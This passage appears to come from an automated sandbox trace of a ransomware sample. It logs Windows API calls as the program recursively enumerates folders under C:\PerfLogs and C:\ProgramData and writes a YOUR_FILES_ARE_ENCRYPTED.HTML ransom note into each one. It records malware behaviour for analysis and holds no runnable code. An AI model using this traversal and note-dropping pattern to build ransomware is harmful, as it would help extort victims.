lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.218] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0155.218] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.220] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 51 [0155.220] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\perflogs\\admin\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.221] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.223] CloseHandle (hObject=0x4a4) returned 1 [0155.223] GetProcessHeap () returned 0x270000 [0155.224] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.224] FindNextFileW (in: hFindFile=0x42f30c0, 
lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0155.224] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0155.224] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 45 [0155.224] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\perflogs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0155.224] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0155.226] CloseHandle (hObject=0x580) returned 1 [0155.227] GetProcessHeap () returned 0x270000 [0155.227] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0155.228] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf9ab9533, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xb35baea0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb35baea0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0155.228] 
FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="ProgramData", cAlternateFileName="PROGRA~2")) returned 1 [0155.228] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData") returned 18 [0155.228] GetProcessHeap () returned 0x270000 [0155.228] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.228] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\ProgramData" | out: lpString1="\\\\?\\C:\\ProgramData") returned="\\\\?\\C:\\ProgramData" [0155.228] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\*") returned="\\\\?\\C:\\ProgramData\\*" [0155.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0155.228] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.228] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0155.228] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Application Data") returned 35 [0155.228] GetProcessHeap () returned 0x270000 [0155.228] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.228] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Application Data" | out: lpString1="\\\\?\\C:\\ProgramData\\Application Data") returned="\\\\?\\C:\\ProgramData\\Application Data" [0155.228] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Application Data\\*") returned="\\\\?\\C:\\ProgramData\\Application Data\\*" [0155.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x73e0048, ftCreationTime.dwLowDateTime=0x42fdf30, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebe1cc, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hܾ")) returned 0xffffffff [0155.235] GetProcessHeap () returned 
0x270000 [0155.236] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.236] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0155.236] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Desktop") returned 26 [0155.236] GetProcessHeap () returned 0x270000 [0155.236] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.236] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Desktop" | out: lpString1="\\\\?\\C:\\ProgramData\\Desktop") returned="\\\\?\\C:\\ProgramData\\Desktop" [0155.236] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Desktop\\*") returned="\\\\?\\C:\\ProgramData\\Desktop\\*" [0155.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x73e0048, ftCreationTime.dwLowDateTime=0x42fdf30, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebe1cc, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hܾ")) returned 0xffffffff [0155.236] GetProcessHeap () returned 0x270000 [0155.237] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.237] FindNextFileW (in: 
hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0155.237] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Documents") returned 28 [0155.237] GetProcessHeap () returned 0x270000 [0155.237] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.237] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Documents" | out: lpString1="\\\\?\\C:\\ProgramData\\Documents") returned="\\\\?\\C:\\ProgramData\\Documents" [0155.237] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Documents\\*") returned="\\\\?\\C:\\ProgramData\\Documents\\*" [0155.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x73e0048, ftCreationTime.dwLowDateTime=0x42fdf30, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebe1cc, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hܾ")) returned 0xffffffff [0155.238] GetProcessHeap () returned 0x270000 [0155.238] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.238] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, 
ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0155.238] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Favorites") returned 28 [0155.238] GetProcessHeap () returned 0x270000 [0155.238] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.238] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Favorites" | out: lpString1="\\\\?\\C:\\ProgramData\\Favorites") returned="\\\\?\\C:\\ProgramData\\Favorites" [0155.238] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Favorites\\*") returned="\\\\?\\C:\\ProgramData\\Favorites\\*" [0155.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Favorites\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x73e0048, ftCreationTime.dwLowDateTime=0x42fdf30, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebe1cc, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hܾ")) returned 0xffffffff [0155.239] GetProcessHeap () returned 0x270000 [0155.239] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.239] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, 
ftLastAccessTime.dwLowDateTime=0x7c5a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7c5a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0155.239] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft") returned 28 [0155.239] GetProcessHeap () returned 0x270000 [0155.239] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.239] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Microsoft" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft") returned="\\\\?\\C:\\ProgramData\\Microsoft" [0155.240] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*" [0155.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7c5a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7c5a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.240] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7c5a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7c5a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="..", cAlternateFileName="")) returned 1 [0155.240] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0155.240] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance") returned 39 [0155.240] GetProcessHeap () returned 0x270000 [0155.240] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0155.242] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance" [0155.242] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*" [0155.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0155.242] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.242] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Client", cAlternateFileName="")) returned 1 [0155.242] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client") returned 46 [0155.242] GetProcessHeap () returned 0x270000 [0155.242] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7401060 [0155.244] lstrcpyW (in: lpString1=0x7401060, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client" [0155.244] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*" [0155.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, 
ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.244] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.244] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xd8429d0a, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0x963315a8, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1.0", cAlternateFileName="")) returned 1 [0155.244] wnsprintfW (in: pszDest=0x7401060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0") returned 50 [0155.244] GetProcessHeap () returned 0x270000 [0155.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7412070 [0155.246] lstrcpyW (in: lpString1=0x7412070, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0" [0155.246] lstrcatW (in: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*" [0155.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xd8429d0a, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0x963315a8, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.246] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xd8429d0a, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0x963315a8, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.246] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0155.246] wnsprintfW (in: pszDest=0x7412070, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US") 
returned 56 [0155.246] GetProcessHeap () returned 0x270000 [0155.246] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7423080 [0155.248] lstrcpyW (in: lpString1=0x7423080, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0155.249] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*" [0155.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", 